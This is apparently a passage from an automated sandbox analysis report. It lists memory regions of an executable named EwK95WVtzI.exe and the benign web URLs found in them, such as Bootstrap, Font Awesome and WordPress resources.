EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js?ver=1.0.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1388843234.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stats.wp.com/w.js?ver=202341
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1388843234.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tickets.suresupport.com/faq/article-1596/en
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/css/all.css
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/css/v4-shims.css
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.eot
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.eot?#iefix
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.svg#fontawesome
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.ttf
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff2
